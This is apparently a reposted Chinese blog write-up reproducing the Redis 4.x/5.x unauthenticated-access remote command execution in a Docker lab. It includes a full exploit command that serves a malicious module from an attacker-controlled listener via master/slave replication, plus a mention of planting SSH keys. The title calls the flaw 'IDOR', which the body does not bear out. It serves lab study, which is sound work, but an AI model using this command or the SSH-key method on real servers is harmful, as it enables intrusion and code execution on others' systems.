Redis 4.x/5.x IDOR漏洞复现[通俗易懂]
2023-06-13 09:12:02 时间
大家好,又见面了,我是你们的朋友全栈君。
Redis 4.x/5.x 未授权访问漏洞
Redis未授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。
漏洞复现
最近碰到ctf的题目是通过ssrf和redis的未授权访问打入内网getshell,想着用docker复现以下此漏洞。
拉取环境开启环境后,如图
使用redis-cli -h your-ipj即可连接redis数据库,并且可以清空所有数据,即有未授权访问漏洞
使用poc实现远程命令执行
先将下载好的poc目录下的redismoudleSDK进行编译
但是即使进行编译之后还是会报错,因为没有装redis-cli
因为之前ubantu靶机装了但是kali没有装(后来发现并没有影响仔细找错甚至看了整个脚本)原来是我的8888端口号被占用了执行不了
python3 redis-master.py -r 192.168.11.147 -p 6379 -L 192.168.11.129 -p 8888 -f RedisModulesSDK/exp.so -c “id”
从而实现命令执行
此外还有一种方法就是利用ssh密钥
使用我的kali对ssh生成一个空密码,将密钥传输到靶机即redis上,然后可以使用ssh免密登录。
至此复现完成
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/134445.html原文链接:https://javaforall.cn
相关文章
- java redis密码_Redis 密码设置和查看密码[通俗易懂]
- Redis管理:实现图形界面的便捷操作(redis图形界面)
- 警惕:Redis服务器漏洞攻击危机”(redis漏洞攻击)
- 查看Redis中Key的过期时间(redis过期时间查看)
- 阿里云 Redis:漏洞知多少?(阿里云redis漏洞)
- 基于Redis的分布式数据锁研究(redis数据锁)
- Redis 服务器遭受漏洞利用,防范之道值得考虑(redis漏洞利用)
- 化终结Redis脚本化世界的开始(结束Redis的脚本)
- Redis漏洞安全隐患提前预防(漏洞 redis)
- 探索NoSQL 从零开始使用Redis(接入redis)
- SSRF漏洞与Redis缓存引起的危机(ssrf与redis利用)
- 警惕Redis空密码漏洞的危害(存在redis空密码漏洞)
- 内网Redis服务器的安全漏洞审查(内网redis漏洞)
- 简单几步快速清空Redis内数据(如何清空redis内数据)
- Redis集群构建打造安全可靠的缓存系统(如何做redis集群)
- Redis需要内存吗(redis需要内存么)
- Redis集群库存超卖的警告(redis集群库存超卖)
- 安装Redis集群,让用户尽享实时数据服务(redis集群安装用户)
- Redis重启引发索引异常警讯(redis重启报索引异常)
- 重启后Redis快速加入集群(redis重启加入集群)
- 技巧Redis联合Maven进阶实践配置技巧篇(redis配置maven)
- 改变全局改变Redis连接方式,重塑全局景象(redis 连接方式)
- 部署如何快速部署Redis单机连接(redis连接单机)
- Redis访问漏洞研究与复现(redis访问漏洞复现)